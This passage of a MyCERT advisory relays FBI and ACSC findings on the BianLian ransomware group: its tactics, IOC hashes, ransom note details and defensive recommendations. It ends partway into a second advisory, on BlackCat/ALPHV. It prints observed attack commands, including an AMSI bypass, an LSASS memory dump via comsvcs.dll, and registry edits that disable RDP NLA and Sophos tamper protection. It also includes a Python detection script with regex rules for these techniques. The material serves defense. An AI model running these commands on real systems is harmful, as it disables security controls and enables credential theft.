BianLian group actors use PowerShell and Windows Command Shell to disable antivirus tools, specifically Windows Defender and the Anti-Malware Scan Interface (AMSI). BianLian actors modify the Windows Registry to disable tamper protection for the Sophos SAVEnabled, SEDEnabled, and SAVService settings, which enables them to uninstall these services. See Table 2 (PowerShell and Windows Command Shell Activity) for the specific commands they have used.

2.4 Discovery
BianLian group actors use a combination of compiled tools, which they first download to the victim environment, to learn about the victim’s environment. BianLian group actors have used: 
• Advanced Port Scanner, a network scanner used to find open ports on network computers and retrieve versions of programs running on the detected ports.
• SoftPerfect Network Scanner (netscan.exe), a network scanner that can ping computers, scan ports, and discover shared folders. 
• SharpShares to enumerate accessible network shares in a domain. 
• PingCastle to enumerate Active Directory (AD). PingCastle provides an AD map to visualize the hierarchy of trust relationships. 
BianLian actors also use native Windows tools and Windows Command Shell to: 
• Query currently logged-in users. 
• Query the domain controller to identify:

  • All groups.
  • Accounts in the Domain Admins and Domain Computers groups.
  • All users in the domain. 

• Retrieve a list of all domain controllers and domain trusts. 
• Identify accessible devices on the network. 

2.5 Credential Access
BianLian group uses valid accounts for lateral movement through the network and to pursue other follow-on activity. To obtain the credentials, BianLian group actors use Windows Command Shell to find unsecured credentials on the local machine. FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory, download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (NTDS.dit).
In one case, FBI observed BianLian actors use a portable executable version of an Impacket tool (secretsdump.py) to move laterally to a domain controller and harvest credential hashes from it. 
Note: Impacket is a Python toolkit for programmatically constructing and manipulating network protocols. Through the Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network.

2.6 Persistence and Lateral Movement
BianLian group actors use PsExec and RDP with valid accounts for lateral movement. Prior to using RDP, BianLian actors use Command Shell and native Windows tools to add user accounts to the local Remote Desktop Users group, modify the added account's password, and modify Windows firewall rules to allow incoming RDP traffic. See Table 2 (PowerShell and Windows Command Shell Activity) for the specific commands.
In one case, FBI found a forensic artifact (exp.exe) on a compromised system that likely exploits the Netlogon vulnerability (CVE-2020-1472) and connects to a domain controller.

2.7 Collection
FBI observed BianLian group actors using malware (system.exe) that enumerates registry and files and copies clipboard data from users.

2.8 Exfiltration and Impact
BianLian group actors search for sensitive files using PowerShell scripts (See Appendix: Windows PowerShell and Command Shell Activity) and exfiltrate them for data extortion. Prior to January 2023, BianLian actors encrypted files after exfiltration for double extortion. 
BianLian group uses File Transfer Protocol (FTP) and Rclone, a tool used to sync files to cloud storage, to exfiltrate data. FBI observed BianLian group actors install Rclone and other files in generic and typically unchecked folders such as programdata\vmware and music folders. ACSC observed BianLian group actors use Mega file-sharing service to exfiltrate victim data. 
BianLian’s encryptor (encryptor.exe) modified all encrypted files to have the .bianlian extension. The encryptor created a ransom note, Look at this instruction.txt, in each affected directory (see Figure 1 for an example ransom note.) According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files.


Figure 1: BianLian Sample Ransom Note (Look at this instruction.txt)

If a victim refuses to pay the ransom demand, BianLian group threatens to publish exfiltrated data to a leak site maintained on the Tor network. The ransom note provides the Tox ID A4B3B0845DA242A64BF17E0DB4278EDF85855739667D3E2AE8B89D5439015F07E81D12D767FC, which does not vary across victims. The Tox ID directs the victim organization to a Tox chat via https://qtox.gitbhub[.]io and includes an alternative contact email address (swikipedia@onionmail[.]org or xxx@mail2tor[.]com). The email address is also the same address listed on the group’s Tor site under the contact information section. Each victim company is assigned a unique identifier included in the ransom note. BianLian group receives payments in unique cryptocurrency wallets for each victim company. 
BianLian group engages in additional techniques to pressure the victim into paying the ransom; for example, printing the ransom note to printers on the compromised network. Employees of victim companies also reported receiving threatening telephone calls from individuals associated with BianLian group.
 

3.0 Indicators of Compromise
See Table 1 for IOCs obtained from FBI investigations as of March 2023.

Name          | SHA-256 hash                                                     | Description
def.exe       | 7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893 | Malware associated with BianLian intrusions; an example of a possible backdoor developed by BianLian group.
encryptor.exe | 1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43 | Example of a BianLian encryptor.
exp.exe       | 0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500 | Possible NetLogon vulnerability (CVE-2020-1472) exploitation.
system.exe    | 40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce | Enumerates registry and files. Reads clipboard data.

Table 1: BianLian Ransomware and Data Extortion Group IOCs

Through FBI investigation as of March 2023, FBI has observed BianLian actors use the commands in Table 2. ACSC has observed BianLian actors use some of the same commands.

 

Each entry below gives the observed command, followed by its use.

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
    Use: Disables AMSI on Windows. AMSI is a built-in feature of Windows 10 and newer that provides an interface for anti-malware scanners to inspect scripts prior to execution. With AMSI disabled, malicious scripts may bypass antivirus solutions and execute undetected.

cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full
    Use: Creates a memory dump of the lsass.exe process through the MiniDump export of comsvcs.dll and saves it under a .csv file name (see https://attack.mitre.org/versions/v12/techniques/T1003/001/). BianLian actors used it to harvest credentials from lsass.exe.

cmd.exe /Q /c net user <admin> /active:yes 1> \\127.0.0.1\C$\Windows\Temp\<folder> 2>&1
    Use: Activates the local Administrator account.

cmd.exe /Q /c net user "<admin>" <password> 1> \\127.0.0.1\C$\Windows\Temp\<folder> 2>&1
    Use: Changes the password of the newly activated local Administrator account.

cmd.exe /Q /c quser 1> \\127.0.0.1\C$\Windows\Temp\<folder> 2>&1
    Use: Executes quser.exe to query the currently logged-in users on a machine. The command is given arguments to run quietly and exit upon completion, and the output is directed to the \Windows\Temp directory.

dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart
    Use: Uses the Deployment Image Servicing and Management (DISM) executable to remove the Windows Defender feature.

dump.exe -no-pass -just-dc user.local/<fileserver.local>\@<local_ip>
    Use: Executes secretsdump.py, a Portable Executable version of an Impacket tool. Used to dump password hashes from domain controllers.

exp.exe -n <fileserver.local> -t <local_ip>
    Use: Possibly attempted exploitation of the NetLogon vulnerability (CVE-2020-1472).

findstr /spin "password" *.* >C:\Users\training\Music\<file>.txt
    Use: Searches for the string "password" in all files in the current directory and its subdirectories and writes the output to a file.

ldap.exe -u user\<user> -p <password> ldap://<local_ip>
    Use: Connects to the organization's Lightweight Directory Access Protocol (LDAP) server.

logoff
    Use: Logs off the current user from a Windows session. Can be used to log off multiple users at once.

mstsc
    Use: Launches the Microsoft Remote Desktop Connection client application in Windows.

net group /domain
    Use: Retrieves a list of all groups from the domain controller.

net group 'Domain Admins' /domain
    Use: Queries the domain controller to retrieve a list of all accounts in the Domain Admins group.

net group 'Domain Computers' /domain
    Use: Queries the domain controller to retrieve a list of all accounts in the Domain Computers group.

net user /domain
    Use: Queries the domain controller to retrieve a list of all users in the domain.

net.exe localgroup "Remote Desktop Users" <user> /add
    Use: Adds a user account to the local Remote Desktop Users group.

net.exe user <admin> <password> /domain
    Use: Modifies the password for the specified domain account.

netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in protocol=TCP localport=<port num> action=allow
    Use: Adds a new rule to the Windows firewall that allows incoming RDP traffic.

netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=Yes
    Use: Enables the pre-existing Windows firewall rule group named Remote Desktop. This rule group allows incoming RDP traffic.

nltest /dclist
    Use: Retrieves a list of domain controllers.

nltest /domain_trusts
    Use: Retrieves a list of domain trusts.

ping.exe -4 -n 1 *
    Use: Sends a single ICMP echo request packet to all devices on the local network using IPv4. The output shows whether each device is reachable.

quser; ([adsisearcher]"(ObjectClass=computer)").FindAll().count;([adsisearcher]"(ObjectClass=user)").FindAll().count;[Security.Principal.WindowsIdentity]::GetCurrent() | select name;net user "$env:USERNAME" /domain; (Get-WmiObject -class Win32_OperatingSystem).Caption; Get-WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem; net group "domain admins" /domain; nltest /dclist:; nltest /DOMAIN_TRUSTS
    Use: Lists the currently logged-in users. Uses the Active Directory Service Interfaces (ADSI) searcher to count all computer and user objects in the domain. Lists the current Windows identity and displays the user's name. Lists information about the current user account from the domain, such as the user's name, description, and group memberships. Lists information about the operating system installed on the local computer. Lists information about the "Domain Admins" group from the domain. Lists all domain controllers in the domain. Displays information about domain trusts.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
    Use: Adds/overwrites the UserAuthentication value of the RDP-Tcp listener with 0, which disables Network Level Authentication (NLA) so that RDP clients are no longer required to authenticate before a session is created.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    Use: Adds/overwrites a Registry value to allow a user to receive help from Remote Assistance.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config" /t REG_DWORD /v SAVEnabled /d 0 /f
    Use: Adds/overwrites a Registry value to disable Sophos tamper protection for the SAVEnabled setting.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config" /t REG_DWORD /v SEDEnabled /d 0 /f
    Use: Adds/overwrites a Registry value to disable Sophos tamper protection for the SEDEnabled setting.

reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Sophos\SAVService\TamperProtection /t REG_DWORD /v Enabled /d 0 /f
    Use: Adds/overwrites a Registry value to disable tamper protection for the Sophos antivirus service SAVService.

reg.exe copy hklm\system\CurrentControlSet\services\tvnserver hklm\system\CurrentControlSet\control\safeboot\network\tvnserver /s /f
    Use: Copies the configuration of the tvnserver service (a TightVNC server) to the Safe Mode with Networking key in the registry, so the service runs with the same settings in Safe Mode as in normal mode.

s.exe /threads:50 /ldap:all /verbose /outfile:c:\users\<user>\desktop\1.txt
    Use: Executes SharpShares.

schtasks.exe /RU SYSTEM /create /sc ONCE /<user> /tr "cmd.exe /c rundll32.exe c:\programdata\netsh.dll,Entry" /ST 04:43
    Use: Creates a scheduled task that runs as SYSTEM once at 04:43. When the task fires, cmd.exe /c runs rundll32.exe to load netsh.dll and call its Entry export. (netsh.dll is likely a malware file, not associated with the legitimate netsh utility.)

start-process PowerShell.exe -arg C:\Users\Public\Music\<file>.ps1 -WindowStyle Hidden
    Use: Executes a PowerShell script while keeping the PowerShell window hidden from the user.

Table 2: PowerShell and Windows Command Shell Activity
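The commands in Table 2 contain tokens that rarely appear in legitimate administration (amsiInitFailed, the comsvcs.dll MiniDump export, UserAuthentication set to 0, Sophos TamperProtection set to 0, a service copied under safeboot\network), which makes them good candidates for process-creation detections. The following is an added example written for this advisory, not MyCERT's, FBI's or ACSC's own tooling: a small rule set derived from Table 2, plus the remote-access tools named in section 2.2 and the Rclone exfiltration tool from section 2.8, run over constructed process-creation records. The record fields (host, user, cmdline) are assumptions; map them onto your own Security 4688 or Sysmon Event ID 1 schema.

```python
"""Scan Windows process-creation records for the BianLian command patterns in Table 2.

Added example for this advisory; not MyCERT's, FBI's or ACSC's own tooling. The
records in SAMPLE_EVENTS are constructed, not real telemetry, and the field names
(host, user, cmdline) are assumptions; map them to your own 4688/Sysmon schema.
"""
import re

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}

# (rule name, severity, regex). Each pattern keys on a distinctive token from the
# corresponding Table 2 command or from the tooling named in sections 2.2 and 2.8.
RULES = [
    ("amsi_bypass",            "high",   r"amsiInitFailed"),
    ("lsass_dump_comsvcs",     "high",   r"comsvcs\.dll.*\bMiniDump\b"),
    ("defender_removed_dism",  "high",   r"\bdism(\.exe)?\b.*Disable-Feature.*Windows-Defender"),
    ("rdp_nla_disabled",       "high",   r"RDP-Tcp.*UserAuthentication.*/d\s*0\b"),
    ("sophos_tamper_disabled", "high",   r"Sophos.*TamperProtection.*/d\s*0\b"),
    ("safeboot_service_copy",  "medium", r"\breg(\.exe)?\s+copy\b.*safeboot\\network"),
    ("rdp_firewall_opened",    "medium", r"\bnetsh(\.exe)?\s+advfirewall\b.*remote ?desktop"),
    ("rdp_users_group_add",    "medium", r'localgroup\s+"?Remote Desktop Users"?.*/add'),
    ("schtask_rundll32_dll",   "medium", r"\bschtasks(\.exe)?\b.*rundll32.*\.dll"),
    ("cloud_exfil_tool",       "medium", r"\brclone(\.exe)?\b"),
    ("hidden_powershell",      "low",    r"-WindowStyle\s+Hidden"),
    ("remote_access_tool",     "low",    r"\b(anydesk|teamviewer|atera|splashtop)\b"),
    ("domain_recon",           "low",    r"\bnltest\b\s+/(dclist|domain_trusts)|\bnet(\.exe)?\s+(group|user)\b.*/domain"),
]
COMPILED = [(name, sev, re.compile(pat, re.IGNORECASE)) for name, sev, pat in RULES]

SAMPLE_EVENTS = [  # constructed: Table 2 look-alikes mixed with benign admin noise
    {"host": "FS01", "user": "svc_backup",
     "cmdline": "powershell.exe -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\""},
    {"host": "FS01", "user": "svc_backup",
     "cmdline": "cmd.exe /Q /c for /f \"tokens=1,2 delims= \" ^%A in ('\"tasklist /fi \"Imagename eq lsass.exe\" "
                "| find \"lsass\"\"') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B \\Windows\\Temp\\x.csv full"},
    {"host": "DC01", "user": "administrator",
     "cmdline": "reg.exe add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" "
                "/v UserAuthentication /t REG_DWORD /d 0 /f"},
    {"host": "WS17", "user": "jdoe", "cmdline": "net.exe localgroup \"Remote Desktop Users\" jdoe /add"},
    {"host": "WS17", "user": "jdoe", "cmdline": "net use Z: \\\\fs01\\share"},
    {"host": "WS17", "user": "SYSTEM", "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"host": "WS22", "user": "SYSTEM", "cmdline": "\"C:\\Program Files\\AnyDesk\\AnyDesk.exe\" --service"},
    {"host": "FS01", "user": "svc_backup", "cmdline": "rclone.exe copy D:\\Finance mega:dump --transfers 8"},
    {"host": "WS17", "user": "jdoe", "cmdline": "nltest /dclist:corp.local"},
]


def scan_events(events):
    """Return one finding per (event, matching rule); an event may match several rules."""
    findings = []
    for ev in events:
        for name, sev, rx in COMPILED:
            if rx.search(ev["cmdline"]):
                findings.append({"host": ev["host"], "user": ev["user"], "rule": name,
                                 "severity": sev, "cmdline": ev["cmdline"]})
    return findings


def triage(findings):
    """Highest severity seen per host, so responders know which boxes to isolate first."""
    worst = {}
    for f in findings:
        if SEVERITY_RANK[f["severity"]] > SEVERITY_RANK.get(worst.get(f["host"]), 0):
            worst[f["host"]] = f["severity"]
    return worst


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['severity']:6} {f['host']:5} {f['user']:12} {f['rule']:24} {f['cmdline'][:60]}")
    print(triage(found))
```

The high-severity rules (AMSI patching, LSASS dumping through comsvcs.dll, DISM removal of Defender, NLA or tamper protection turned off) almost never occur in routine administration and can page on a single hit. The low-severity rules, domain_recon in particular, fire on ordinary help-desk activity and are only useful in aggregate or when they follow a higher-severity event on the same host.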

4.0 Recommendations
MyCERT recommends that organizations implement the recommendations below to improve their cybersecurity posture, based on the threat actor's observed activity.

  • Reduce threat of malicious actors using remote access tools by: 
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable.
    • Using security software to detect instances of remote access software only being loaded in memory. 
    • Requiring authorized remote access solutions only be used from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
  • Implement application controls to manage and control execution of software.
  • Strictly limit the use of RDP and other remote desktop services.
  • Disable command-line and scripting activities and permissions.
  • Restrict the use of PowerShell.
  • Update Windows PowerShell or PowerShell Core.
  • Enable enhanced PowerShell logging.
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations.
  • Review domain controllers, servers, workstations, and Active Directory for new or unrecognized accounts.
  • Audit user accounts.
  • Implement time-based access for accounts set at the admin level and higher.

In addition, MyCERT recommends that network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan.
  • Maintain offline backups of data.
  • Require phishing-resistant multifactor authentication.
  • Keep all operating systems, software, and firmware up to date.
  • Segment networks.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.
  • Install, regularly update, and enable real time detection for antivirus software.
  • Disable unused ports.
  • Consider adding an email banner to emails.
  • Ensure all backup data is encrypted, immutable.

Generally, MyCERT advises users to keep up to date with the latest security announcements from their vendors and to follow best-practice security policies when deciding which updates to apply.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

MA-921.042023: MyCERT Advisory - BlackCat Ransomware

  • 11 Apr 2023
  • Advisory
  • BlackCat, alpha, ALPHV, ransomware

1.0 Introduction
MyCERT has observed an increase in ransomware-related attacks, including those executed by the ransomware known as BlackCat/ALPHV. This ransomware variant was identified through FBI investigations. BlackCat/ALPHV ransomware as a service (RaaS) had compromised at least 60 entities worldwide and is the first ransomware group to do so successfully using Rust, considered a more secure programming language with improved performance and reliable concurrent processing. BlackCat-affiliated threat actors typically request ransom payments of several million dollars in Bitcoin and Monero but have accepted payments below the initial demand. Many developers and money launderers for BlackCat/ALPHV are linked to Darkside/BlackMatter, indicating that they have extensive networks and experience with ransomware operations.

2.0 Impact
The payload is delivered as a Rust binary that then runs its encryption routine. The ransomware binary defaces the system's desktop background, replacing it with an image stating that important files have been downloaded and encrypted, together with information on where additional instructions can be found. A sample ransom note is shown below:

Figure 1: Sample ransom note of the BlackCat ransomware binary.

  • The payload also terminates specific services related to backups, antivirus applications, databases, Windows internet services, and ESXi virtual machines (VMs).
  • In addition, a new variant of the BlackCat ransomware binary restarts the affected system to safe mode before proceeding to its encryption routine. It also disables system recovery and deletes volume shadow copies to inhibit the recovery of the affected systems.

3.0 Affected Products

  • Windows 7 and higher (7, 8.1, 10, 11; Server 2008 R2, 2012, 2016, 2019, 2022).
  • Windows XP and 2003.
  • VMware ESXi
  • Debian and Ubuntu Linux
  • ReadyNAS, Synology, QNAP

4.0 Technical Details

BlackCat/ALPHV ransomware leverages previously compromised user credentials to gain initial access to the victim’s system. Once the malware establishes access, it compromises Active Directory user and administrator accounts. The malware uses Windows Task Scheduler to configure malicious Group Policy Objects (GPOs) to deploy ransomware. Initial malware deployment leverages PowerShell scripts in conjunction with Cobalt Strike and disables security features within the victim’s network. BlackCat/ALPHV ransomware also leverages Windows administrative tools and Microsoft Sysinternals tools during compromise. 

BlackCat/ALPHV steals victim data before the execution of the ransomware, including from cloud providers where company or client data was stored. 

The actors leverage Windows scripting to deploy ransomware and to compromise additional hosts. For example, the following batch and PowerShell scripts were observed: 

  • start.bat - launches the ransomware executable with the required arguments.
  • est.bat  - copies the ransomware to other locations.
  • drag-and-drop-target.bat  - launches the ransomware executable for the MySQL Server.
  • run.bat  - executes a callout command to an external server using SSH; file names may change depending on the company and systems affected.
  • Runs1.ps1 - PowerShell script to disable AV.

5.0 Indicators of Compromise

The following are characteristics of compromise by BlackCat/ALPHV, as of mid-February 2022: